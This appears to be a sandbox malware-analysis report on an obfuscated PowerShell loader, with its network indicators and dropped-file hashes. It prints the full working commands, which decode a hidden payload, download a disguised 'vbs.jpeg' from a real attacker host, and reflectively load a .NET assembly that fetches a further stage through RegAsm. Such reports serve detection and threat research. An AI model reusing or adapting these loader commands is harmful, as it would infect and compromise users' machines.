㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴aQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴ZwBl≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴TwBm≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Zg≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBn≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴r≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴dQBi≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴By≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴Ew≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴WwBT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴ZQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴XQ≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴RgBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBC≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQBk≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bb≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴eQBz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴ZQBt≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bg≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQBd≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴OgBM≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴EI≩ ⫻ ㏤ ≪ ㏴eQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YgBs≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BU≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴E8≩ ⫻ ㏤ ≪ ㏴LgBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBl≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴7≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bt≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BN≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴VgBB≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴bwBr≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴bwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴WwBd≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴B4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBC≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴UgBU≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴O≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴4≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴NQ≩ ⫻ ㏤ ≪ ㏴z≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lg≩ ⫻ ㏤ ≪ ㏴y≩ ⫻ ㏤ ≪ ㏴Dk≩ ⫻ ㏤ ≪ ㏴MQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴DM≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴x≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBS≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline
| MD5 | 38199bcd7f6c80e2a09e4198e6447f2d |
| SHA1 | aa98cc6d12095f730e922ed9e6fbf0a6b3166abc |
| SHA256 | 185d1ddb883f05193e43e40b899d46f23eb5903265d82ae45dd189c21731aa42 |
| SHA512 | 9790b7a1a545e360bfc9b92db523e774bcf2bc5d39e0b6506244fe94584bdcdf181a5c9a6cbe24c1f30afb95ede61ac34999ce0e565fc952475517560a5b44fa |
\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.0.cs
| MD5 | d71dc34ff8dbecd13f179ed952a841d5 |
| SHA1 | 78c3b0d410495a39154fbd26663468d6e5de5768 |
| SHA256 | 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175 |
| SHA512 | 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f |
\??\c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp
| MD5 | 3c73d2605638c2a3f1a02341a397c7c4 |
| SHA1 | 6dfaa0ef708a70098aa05c4381f89f8f447a0067 |
| SHA256 | 5f69f30731ad28f51c2fca48991f19a79105f810a3450b21ce0add96abf3e624 |
| SHA512 | b0f04304d7363ded4985822f6fc14790777a31c8a3f46b18e17d05f238c0adc52b35598fc4740dddfb6577016f22b6dc7bcd12ddba449d8a69b7d71515f9e689 |
C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp
| MD5 | b2bec49cb083f053093ffc4727e352cc |
| SHA1 | 3c28cbc8ec291c3b957a46e6b55e7db7074c3979 |
| SHA256 | 84ea5ad77d4e025b6ab2565d2b78a95aa3bcada4b9a505e5477d165482194665 |
| SHA512 | f46c355083dcdccfd45db49a2c8d80326528629fb6c12cf5e8118be5855769ed0f420b77baba15bffe2c947fdac136f20fad100401b7219cf5bb434ec300e4b8 |
C:\Users\Admin\AppData\Local\Temp\e410m-ly.dll
| MD5 | b5cb5a94ef5c0f34e44be338a4950b5e |
| SHA1 | 8eb5a01a796b2c0365e4e637310aabee3d5e9a0f |
| SHA256 | 4c6b0fb7081e025e356bc7db7e0b9f563a6526afb9780bb8101afe34977aca7b |
| SHA512 | 988163de59a7fc01560742424046ffb1f03bc389eb29467878c07fbfbceac5832396acb003b6d5e0338f78f697732d727dd0075d70c38d7e36778706f646a0b5 |
C:\Users\Admin\AppData\Local\Temp\e410m-ly.pdb
| MD5 | 07e94ca06fef76a9e98089b68dd06565 |
| SHA1 | e0175c04fc676627aa5cf68053d9b67d488bf8f2 |
